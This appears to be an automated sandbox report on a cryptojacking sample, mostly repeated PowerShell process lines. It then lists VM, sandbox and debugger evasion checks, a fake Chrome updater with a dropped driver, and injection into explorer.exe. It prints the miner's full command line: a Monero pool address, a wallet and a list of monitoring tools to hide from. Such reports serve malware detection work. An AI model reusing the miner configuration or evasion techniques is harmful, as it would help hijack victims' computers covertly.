                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEKYYGH.EXEEC
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEXEEXEE
                Source: explorer.exe, 0000003B.00000002.4508280738.0000000001BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEOCESSORZ
                Source: explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEKYYGH.EXEEP
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="44GJCAUWCV8HFKRNB7Q7UA2U5TT3HW131YDDDSCRVK436U7OGLYIGYN98ZMJURRZ4VWRSZV8UIPSUN9JPELPFC2CBNTZXJE.RIG3{COMPUTERNAME}/A@A.RU" --PASS="" --CPU-MAX-THREADS-HINT=100 --CINIT-WINRING="MNIDGYZVURAN.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.1" --TLS --CINIT-ID="IRGETNFCWNLZCJJX"
                Source: explorer.exe, 0000003B.00000003.3450981482.0000000001198000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4508056001.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE;C:\WINDOWS
                Source: explorer.exe, 0000003B.00000002.4508280738.0000000001BA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.2189432512.00000000010FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 0000003B.00000003.2189432512.00000000010FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEIRGETNFCWNLZCJJX
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=44GJCAUWCV8HFKRNB7Q7UA2U5TT3HW131YDDDSCRVK436U7OGLYIGYN98ZMJURRZ4VWRSZV8UIPSUN9JPELPFC2CBNTZXJE.RIG3{COMPUTERNAME}/A@A.RU--PASS=--CPU-MAX-THREADS-HINT=100--CINIT-WINRING=MNIDGYZVURAN.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.1--TLS--CINIT-ID=IRGETNFCWNLZCJJX
                Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6033Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3713Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6536Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3081Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\mnidgyzvuran.sysJump to dropped file
                Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe TID: 2276Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 6033 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 3713 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep count: 6536 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 3081 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: TwrhjEKqxk.exe, 00000000.00000002.2149228752.000002394559C000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000022.00000002.2192066707.000002166E533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: regmonclass
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: procmon_window_class
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: filemonclass
                Source: C:\ProgramData\Google\Chrome\updater.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPortJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugPortJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\conhost.exeCode function: 57_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,57_2_0000000140001160

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 162.19.224.121 10343Jump to behavior
